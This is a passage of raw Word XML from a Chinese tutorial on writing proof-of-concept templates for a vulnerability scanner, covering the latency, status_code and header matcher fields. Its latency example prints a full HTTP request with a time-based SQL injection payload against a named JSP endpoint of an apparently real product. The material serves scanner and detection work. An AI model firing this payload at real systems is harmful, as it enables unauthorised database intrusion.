          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>latency</w:t>
      </w:r>
      <w:r w:rsidR="00AB61A5" w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidR="00AB61A5" w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>延时</w:t>
      </w:r>
      <w:r w:rsidR="00AB61A5" w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48E95E" w14:textId="50221F86" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试sql延时注入的字段，以下poc示例，使服务器延时</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB61A5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>秒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61A5" w14:paraId="51551AE7" w14:textId="77777777" w:rsidTr="00AB61A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6A75E7" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>GET /u8qx/dialog_moreUser_check.jsp?mlid=';waitfor+delay+'0:0:</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB61A5">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>'-- HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="283A10F6" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Host:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56A97286" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D9B719F" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F62ACAB" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DAD6DAC" w14:textId="286621CB" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Accept-Language: zh-CN,zh;q=0.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55DBD34D" w14:textId="1EE45D21" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么我们判断填就就设置5秒就可以了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61A5" w14:paraId="5EE91312" w14:textId="77777777" w:rsidTr="00AB61A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70DBBEDA" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3935B5E5" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "latency": 5,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8FE00A" w14:textId="77777777" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DBDA17D" w14:textId="1692D546" w:rsidR="00AB61A5" w:rsidRDefault="00AB61A5" w:rsidP="00AB61A5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4ED2E7AF" w14:textId="37E7307F" w:rsidR="00AB61A5" w:rsidRDefault="00AE1C5D" w:rsidP="00AB61A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B3C3E1F" wp14:editId="4558DF23">
            <wp:extent cx="3063505" cy="2080440"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="1490672704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72704" name="图片 1" descr="图形用户界面, 应用程序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BA77" w14:textId="77777777" w:rsidR="00FB5A90" w:rsidRDefault="00FB5A90" w:rsidP="00AB61A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="114FE105" w14:textId="6718A68E" w:rsidR="00AE1C5D" w:rsidRPr="00A27972" w:rsidRDefault="00AE1C5D" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2C99">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>status_code</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>状态码</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB555A7" w14:textId="2793C5B2" w:rsidR="0086307D" w:rsidRDefault="0086307D" w:rsidP="0086307D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顾名思义，判断网站状态码，在测试poc时对方网站是什么状态码就写什么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307D" w14:paraId="27C7A7C0" w14:textId="77777777" w:rsidTr="0086307D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7648902D" w14:textId="58D00615" w:rsidR="0086307D" w:rsidRDefault="0086307D" w:rsidP="0086307D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14:paraId="5FDCB165" w14:textId="60963944" w:rsidR="0086307D" w:rsidRDefault="0086307D" w:rsidP="0086307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t>"status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="466B91DD" w14:textId="1C11E9F1" w:rsidR="0086307D" w:rsidRDefault="0086307D" w:rsidP="0086307D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78B4B120" w14:textId="77777777" w:rsidR="0086307D" w:rsidRDefault="0086307D" w:rsidP="0086307D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AF70375" w14:textId="0A790A6C" w:rsidR="00FB5A90" w:rsidRDefault="00A055B3" w:rsidP="00A27972">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00AB2C99">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A27972">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>4 header（返回头）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F5E64F" w14:textId="65B3B389" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>H</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eader字段比较特殊，有多种样式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB7F107" w14:textId="58747CC6" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E39B70" wp14:editId="41CED38E">
            <wp:extent cx="2209992" cy="845893"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19157917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917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669B" w14:textId="72B46DC0" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EE341F5" wp14:editId="76836C19">
            <wp:extent cx="3680779" cy="1173582"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="982661509" name="图片 1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661509" name="图片 1" descr="图形用户界面&#10;&#10;中度可信度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B77E4" w14:textId="7606253B" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64CF4616" wp14:editId="7EC0AB5B">
            <wp:extent cx="2956816" cy="1196444"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="16973772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772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D964" w14:textId="3FCB9F7B" w:rsidR="00FD327E" w:rsidRDefault="00FD327E" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>首先大伙都知道返回头，请求头都是以map形式请求的，就是键值对</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461F8B8C" w14:textId="20263202" w:rsidR="00FD327E" w:rsidRDefault="00FD327E" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">键 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD327E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EC6F77" w14:textId="26357824" w:rsidR="00FD327E" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先你若是单纯的判断对方的</w:t>
      </w:r>
      <w:r w:rsidR="00F424AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回头字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中是否存在指定的关键字，是需要将关键字写入即可，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F75C1C8" w14:textId="25826D57" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
      <w:r w:rsidR="00F424AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断对方返回头字段中是否</w:t>
      </w:r>
      <w:r w:rsidR="008A401F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包含</w:t>
      </w:r>
      <w:r w:rsidR="00F424AF">
        <w:t>text/html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77EC" w14:paraId="1E2B574D" w14:textId="77777777" w:rsidTr="00FD77EC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B64BEFF" w14:textId="77777777" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D376351" w14:textId="017CCA2D" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "header": "text/html"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C9C95CA" w14:textId="50EA111D" w:rsidR="00FD77EC" w:rsidRDefault="00FD77EC" w:rsidP="00FD77EC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0671BBBF" w14:textId="01BE29EC" w:rsidR="00FD77EC" w:rsidRDefault="002A3C23" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="008A401F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>若是判断对方返回头是否包含指定的关键字字段，就使用下面的写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309BB465" w14:textId="6F44D45D" w:rsidR="00FD327E" w:rsidRDefault="00FD327E" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如对方返回头中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD327E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Content-Type是否包含指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD327E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> text/html字段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9A3CF" w14:textId="35B09DE6" w:rsidR="002A3C23" w:rsidRDefault="002A3C23" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53A63DEC" wp14:editId="0E03E8BA">
            <wp:extent cx="3886537" cy="1150720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1218652219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52219" name="图片 1" descr="图片包含 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401F" w14:paraId="0F9692A4" w14:textId="77777777" w:rsidTr="008A401F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21BEDD90" w14:textId="77777777" w:rsidR="008A401F" w:rsidRDefault="008A401F" w:rsidP="008A401F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5960F937" w14:textId="026D7627" w:rsidR="008A401F" w:rsidRDefault="008A401F" w:rsidP="008A401F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "header": "</w:t>
            </w:r>
            <w:r w:rsidR="002A3C23">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> 键 </w:t>
            </w:r>
            <w:r w:rsidRPr="002A3C23">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="002A3C23">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002A3C23" w:rsidRPr="002A3C23">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>值</w:t>
            </w:r>
            <w:r w:rsidR="002A3C23">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002A3C23" w:rsidRPr="002A3C23">
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78459FC6" w14:textId="77777777" w:rsidR="008A401F" w:rsidRDefault="008A401F" w:rsidP="008A401F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D701306" w14:textId="220F653E" w:rsidR="008A401F" w:rsidRDefault="008A401F" w:rsidP="008A401F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2CFD8DFB" w14:textId="389A506E" w:rsidR="008A401F" w:rsidRDefault="002A3C23" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有些漏洞特殊，返回的信息是键。</w:t>
      </w:r>
      <w:r w:rsidR="00FD327E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单纯只想判断返回头的键，不判断值，那么就把值省略掉就好</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，值用_替换掉。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B786132" w14:textId="0D399D88" w:rsidR="00FD327E" w:rsidRDefault="00FD327E" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD7FF16" w14:textId="19B93D20" w:rsidR="00FD327E" w:rsidRDefault="00FD327E" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="726AA8C6" wp14:editId="00D99DF5">
            <wp:extent cx="2842506" cy="967824"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="8019870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870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327E" w14:paraId="74E0B026" w14:textId="77777777" w:rsidTr="00FD327E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8296" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EFD2306" w14:textId="77777777" w:rsidR="009266B4" w:rsidRDefault="009266B4" w:rsidP="009266B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70355D77" w14:textId="71C736FD" w:rsidR="009266B4" w:rsidRDefault="009266B4" w:rsidP="009266B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "header": "</w:t>
            </w:r>
            <w:r w:rsidR="002A3C23">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>包含的关键字</w:t>
            </w:r>
            <w:r w:rsidRPr="002A3C23">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:t>_",</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A4F9897" w14:textId="77777777" w:rsidR="009266B4" w:rsidRDefault="009266B4" w:rsidP="009266B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    "status_code": 200</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1071B2AF" w14:textId="6A9DA428" w:rsidR="00FD327E" w:rsidRDefault="009266B4" w:rsidP="009266B4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48B685CE" w14:textId="77777777" w:rsidR="00FD327E" w:rsidRDefault="00FD327E" w:rsidP="00FD77EC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1443A47E" w14:textId="35651115" w:rsidR="0058730D" w:rsidRDefault="0058730D" w:rsidP="0058730D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc171467011"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="0058730D">
        <w:rPr>
          <w:rFonts w:ascii="方正小标宋简体" w:eastAsia="方正小标宋简体" w:hAnsi="方正小标宋简体" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>复杂的POC编写</w:t>
      </w:r>
